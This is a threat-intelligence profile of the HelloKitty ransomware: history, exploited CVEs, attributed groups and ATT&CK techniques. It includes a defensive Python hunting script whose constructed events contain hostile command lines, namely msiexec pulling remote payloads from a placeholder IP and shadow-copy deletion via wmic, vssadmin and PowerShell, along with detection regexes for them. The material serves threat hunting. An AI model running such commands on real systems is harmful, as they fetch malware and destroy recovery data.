HELLOKITTY
HelloKitty is a human-operated double-extortion ransomware family active since November 2020. Its operators compromise corporate networks, steal data, encrypt systems, and threaten to publish the stolen data if victims do not pay. The family has been associated with high-profile attacks including the February 2021 intrusion against CD Projekt Red, where the operators claimed to have stolen source code for Cyberpunk 2077, Witcher 3, Gwent, and other games. It has also been deployed by other actors, including Vice Society, and Microsoft reported that the activity group DEV-0230 developed and deployed both FiveHands and HelloKitty, often gaining access via DEV-0193's BazaLoader infrastructure. HelloKitty is reportedly built from DeathRansom, has been tracked alongside the related FiveHands payload, and may be associated with Abyss Locker.
Technically, HelloKitty is reported to use an embedded RSA-2048 public key to encrypt victim data for ransom, so encrypted files cannot be recovered without the operators' corresponding private key. It deletes Volume Shadow Copies on compromised Windows hosts, including via WMI, to inhibit recovery. A Linux variant targets VMware ESXi systems. Cited reporting links HelloKitty activity to exploitation of internet-facing vulnerabilities, including Apache ActiveMQ CVE-2023-46604 in two Rapid7 customer environments, where post-exploitation activity included msiexec retrieving remote binaries named M2.png and M4.png. HelloKitty has also been cited in reporting on ransomware targeting SonicWall SMA appliances.
Operationally, the complete source code for the first version of HelloKitty was leaked on a Russian-speaking hacking forum by an actor who claimed to be developing a new, more powerful encryptor. The leaked archive reportedly contained a Visual Studio solution for the encryptor and decryptor and the NTRUEncrypt library used by that version to encrypt files. Researchers assessed the leaked code as legitimate and matching the ransomware used when the operation launched in 2020. Kraken is reported to have emerged from remnants of the HelloKitty ransomware cartel. Older FBI indicators of compromise may be outdated because the encryptor changed over time.
Vulnerabilities exploited
2 CVEs correlated with this family across public research and vendor advisories.
An attacker is exploiting a nearly 2-year-old vulnerability in Apache ActiveMQ to compromise Linux servers and install malicious software on them... The servers were all vulnerable to CVE-2023-46604, a maximum-severity remote code execution bug in Apache ActiveMQ message broker... After deploying DripDropper... the attacker downloaded... the patch for CVE-2023-46604... and replaced them with the patched versions.
Mandiant said in April that the CVE-2021-20016 SMA 100 zero-day was exploited to deploy a new ransomware strain known as FiveHands... Before patches were released in late February 2021, the same bug was abused indiscriminately in the wild.
Groups observed using it
4 distinct threat actors attributed by public researchers.
This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193’s BazaLoader infrastructure.
In addition to deploying preexisting ransomware strains such as HelloKitty in attacks, Vice Society stood out for "disproportionately" targeting the education sector...
A threat actor has leaked the complete source code for the first version of the HelloKitty ransomware on a Russian-speaking hacking forum, claiming to be developing a new, more powerful encryptor.
HELLOKITTY ransomware—used to target Polish video game developer CD Projekt Red—is reportedly built from DEATHRANSOM.
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
“The recently disclosed Apache ActiveMQ remote code execution (RCE) flaw, CVE-2023-46604 is being exploited to spread ransomware binaries… exploiting the serialized class types in the OpenWire protocol that enables attackers to execute arbitrary shell commands.”
Execution
2 techniques
The content repeatedly describes threat actors and malware using WMI/WMIC/wmiexec for remote execution, lateral movement, discovery, persistence, and administrative actions; e.g., 'APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit' and 'Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.'
“…may allow a remote attacker… to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol…”
Defense Evasion
2 techniques
“…load remote binaries with the names M2.png and M4.png… The 32-bit .NET executable named dllloader, contained in both MSI files…”
“the attacker attempts to use the Windows Installer (msiexec) to load remote binaries with the names M2.png and M4.png after successful exploitation.”
Discovery
5 techniques
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
"4H RAT sends an OS version identifier in its beacons"; "admin@338 actors used ... ver ... systeminfo"; "Bundlore will enumerate the macOS version ... using /usr/bin/sw_vers -productVersion"; "DarkTortilla ... querying ... WMI objects"; "Turla ... discover operating system configuration details using the systeminfo and set commands"
"Babuk can enumerate disk volumes, get disk information"; "Ryuk has called GetLogicalDrives ... and GetDriveTypeW"; "Cuba can enumerate local drives, disk type, and disk free space"; "Chimera ... fsutil fsinfo drives"
Lateral Movement
1 technique
"...multiple security flaws... impact SMA 200, 210, 400, 410, and 500v appliances even when the web application firewall (WAF) is enabled."
Exfiltration
1 technique
The gang is known for hacking corporate networks, stealing data, and encrypting systems. The encrypted files and stolen data are then utilized as leverage in double-extortion schemes, where the threat actors threaten to leak data if a ransom is not paid.
Impact
4 techniques
The gang is known for hacking corporate networks, stealing data, and encrypting systems.
The released hellokitty.zip archive contains a Microsoft Visual Studio solution that builds the HelloKitty encryptor and decryptor and the NTRUEncrypt library that this version of the ransomware uses to encrypt files.
“EncDLL acts similarly to ransomware, searching and ending a particular set of processes before starting the encryption process…”
Examples include 'Avaddon uses wmic.exe to delete shadow copies,' 'BlackCat can use wmic.exe to delete shadow copies on compromised networks,' and 'WannaCry utilizes wmic to delete shadow copies.'
The encrypted files and stolen data are then utilized as leverage in double-extortion schemes, where the threat actors threaten to leak data if a ransom is not paid.
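Two of the procedures listed above, Volume Shadow Copy deletion (vssadmin, wmic, or WMI from PowerShell) and msiexec.exe pulling a remote payload whose extension is not .msi (as in the M2.png/M4.png retrievals), are straightforward to hunt in process-creation telemetry. The following Python is an added example, not code from this page, from the cited reporting, or from any vendor product: the hostnames, IP address, paths and events are constructed, and the parent-process field is carried for analyst context only.

```python
"""Hunt HelloKitty-associated procedures in process-creation events.
Added example with constructed telemetry; hosts, IPs and paths are hypothetical."""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse


@dataclass
class ProcessEvent:
    host: str
    image: str           # full path of the spawned executable
    command_line: str
    parent_image: str    # carried for analyst context only


@dataclass
class Finding:
    host: str
    rule: str
    severity: str
    detail: str


# Constructed sample telemetry (hypothetical hostnames, RFC 5737 test address).
SAMPLE_EVENTS = [
    ProcessEvent("mq-01", r"C:\Windows\System32\msiexec.exe",
                 'msiexec.exe /q /i "http://203.0.113.10/M2.png"',
                 r"C:\Program Files\Java\jre\bin\java.exe"),
    ProcessEvent("mq-01", r"C:\Windows\System32\msiexec.exe",
                 'msiexec.exe /q /i "http://203.0.113.10/M4.png"',
                 r"C:\Program Files\Java\jre\bin\java.exe"),
    ProcessEvent("fs-02", r"C:\Windows\System32\wbem\WMIC.exe",
                 "wmic shadowcopy delete /nointeractive",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent("fs-02", r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin.exe delete shadows /all /quiet",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent("ws-07", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -c "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"',
                 r"C:\Windows\explorer.exe"),
    # Looks benign: installer fetched over HTTPS with the expected .msi extension.
    ProcessEvent("it-01", r"C:\Windows\System32\msiexec.exe",
                 'msiexec.exe /i "https://updates.example.test/agent-7.2.msi" /qn',
                 r"C:\Windows\System32\svchost.exe"),
    # Benign: enumerating shadow copies without deleting them.
    ProcessEvent("fs-02", r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin.exe list shadows",
                 r"C:\Windows\System32\cmd.exe"),
]

# Three ways to delete Volume Shadow Copies: vssadmin, wmic, and WMI from PowerShell.
SHADOW_DELETE_PATTERNS = [
    re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I),
    re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I),
    re.compile(r"\bWin32_ShadowCopy\b.*\b(?:Delete|Remove-WmiObject|Remove-CimInstance)\b", re.I),
]
URL_RE = re.compile(r"""https?://[^\s"']+""", re.I)


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_shadow_copy_deletion(ev: ProcessEvent) -> Optional[Finding]:
    for pat in SHADOW_DELETE_PATTERNS:
        if pat.search(ev.command_line):
            return Finding(ev.host, "shadow_copy_deletion", "high",
                           f"{image_name(ev.image)}: {ev.command_line}")
    return None


def detect_remote_msiexec(ev: ProcessEvent) -> Optional[Finding]:
    """msiexec installing from a URL; a non-.msi extension (e.g. .png) is the stronger signal."""
    if image_name(ev.image) != "msiexec.exe":
        return None
    for url in URL_RE.findall(ev.command_line):
        filename = urlparse(url).path.rsplit("/", 1)[-1]
        ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
        severity = "medium" if ext in ("msi", "msp") else "high"
        return Finding(ev.host, "msiexec_remote_payload", severity,
                       f"{url} (extension '.{ext}'), parent={image_name(ev.parent_image)}")
    return None


def hunt(events: List[ProcessEvent]) -> List[Finding]:
    """Run every detector over every event; returns findings in event order."""
    findings = []
    for ev in events:
        for detector in (detect_shadow_copy_deletion, detect_remote_msiexec):
            finding = detector(ev)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.host:6} {f.rule:24} {f.detail}")
```

On the constructed events this yields six findings: three shadow-copy deletions and three remote msiexec installs, of which the two image-extension retrievals are rated high and the .msi fetch only medium. Remote msiexec alone is worth a look in most environments, but the extension mismatch is what separates the pattern reported for CVE-2023-46604 exploitation from routine software deployment; the "list shadows" event is correctly ignored.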
IOCs tracked for this family
4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
25 sources tracked across advisories, community write-ups, and news.
Named ransomware group referenced as a destination for former Conti members; no additional technical details provided.
Ransomware family/cartel referenced as the predecessor/remnant source for the Kraken group.
Referenced as a prior/notorious ransomware operation/cartel whose remnants are linked to Kraken.
Ransomware operation (prominent in 2021) referenced as the predecessor/related operation to Kraken; noted to have attempted rebranding after its source code leak.